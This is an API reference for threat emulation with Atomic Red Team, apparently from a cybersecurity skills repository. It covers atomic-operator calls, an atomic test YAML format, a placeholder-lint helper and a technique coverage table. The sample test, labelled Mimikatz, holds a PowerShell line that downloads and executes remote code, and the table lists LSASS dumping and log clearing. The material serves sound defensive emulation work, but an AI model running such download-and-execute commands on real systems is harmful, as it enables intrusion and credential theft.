Anthropic-Cybersecurity-Skills/skills/performing-threat-emulation-with-atomic-red-team/references/api-reference.md
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00


API Reference: Performing Threat Emulation with Atomic Red Team

atomic-operator (Python)

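```python
from atomic_operator import AtomicOperator

operator = AtomicOperator()

# Run a specific technique. `techniques` takes a list and defaults to
# ['all'], so always pass it explicitly.
operator.run(
    techniques=["T1059.001"],
    atomics_path="./atomic-red-team/atomics",
    # Select individual tests by auto_generated_guid (placeholder value).
    test_guids=["<auto_generated_guid>"],
)

# Run with custom inputs: keyword arguments whose names match a test's
# input_arguments replace the defaults.
operator.run(
    techniques=["T1059.001"],
    atomics_path="./atomic-red-team/atomics",
    command="whoami",
)
```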

Atomic Test YAML Format

```yaml
attack_technique: T1059.001
display_name: "PowerShell"
atomic_tests:
  - name: "Mimikatz"
    description: "Downloads and runs mimikatz"
    supported_platforms: [windows]
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{url}')
      cleanup_command: |
        Remove-Item #{output_file}
    # Every #{name} placeholder used above must be declared here.
    input_arguments:
      url:
        description: "URL to download"
        type: url
        default: "https://example.com/test"
      output_file:
        description: "File removed by cleanup_command"
        type: path
        default: "<output file path>"  # placeholder value
```
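The `#{name}` substitution this YAML format relies on, as an added example (not code from the original page or from atomic-operator): a lint that reports placeholders with no matching `input_arguments` entry, and a renderer that resolves defaults and overrides before anything is executed. `SAMPLE_TEST` is a constructed test in the shape `yaml.safe_load` would return, and `undeclared_placeholders` and `render` are hypothetical helper names.

```python
import re

PLACEHOLDER = re.compile(r"#\{([^}]+)\}")

# Constructed sample: one atomic test as yaml.safe_load would return it.
SAMPLE_TEST = {
    "name": "Constructed example test",
    "supported_platforms": ["windows"],
    "executor": {
        "name": "powershell",
        "command": "Invoke-WebRequest '#{url}' -OutFile '#{output_file}'\n",
        "cleanup_command": "Remove-Item '#{output_file}'; Remove-Item '#{log_file}'\n",
    },
    "input_arguments": {
        "url": {"type": "url", "default": "https://example.com/test"},
        "output_file": {"type": "path", "default": "C:\\Temp\\atomic-out.txt"},
    },
}


def undeclared_placeholders(test):
    """Return {executor field: sorted names used as #{name} but never declared}."""
    declared = set(test.get("input_arguments") or {})
    findings = {}
    for field in ("command", "cleanup_command"):
        used = set(PLACEHOLDER.findall(test.get("executor", {}).get(field) or ""))
        if used - declared:
            findings[field] = sorted(used - declared)
    return findings


def render(test, field="command", overrides=None):
    """Substitute #{name} with the override if given, else the declared default."""
    declared = test.get("input_arguments") or {}
    overrides = overrides or {}
    unknown = set(overrides) - set(declared)
    if unknown:
        raise KeyError(f"overrides not declared as input_arguments: {sorted(unknown)}")

    def substitute(match):
        name = match.group(1)
        if name not in declared:
            raise KeyError(f"#{{{name}}} is not declared under input_arguments")
        return str(overrides.get(name, declared[name].get("default", "")))

    return PLACEHOLDER.sub(substitute, test["executor"].get(field) or "")
```

Running the lint over every test in an atomics folder before an emulation run catches cleanup commands that would otherwise be executed with an unresolved placeholder.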

Key CLI Commands

```bash
# Clone atomics
git clone https://github.com/redcanaryco/atomic-red-team

# Install operator
pip install atomic-operator

# List tests for technique
ls atomic-red-team/atomics/T1059.001/
```

Coverage Mapping

| Tactic | Example Techniques |
|---|---|
| Execution | T1059.001 (PowerShell), T1059.003 (cmd) |
| Persistence | T1053.005 (Scheduled Task), T1547.001 (Run Keys) |
| Defense Evasion | T1070.001 (Clear Event Logs) |
| Credential Access | T1003.001 (LSASS), T1558.003 (Kerberoasting) |

References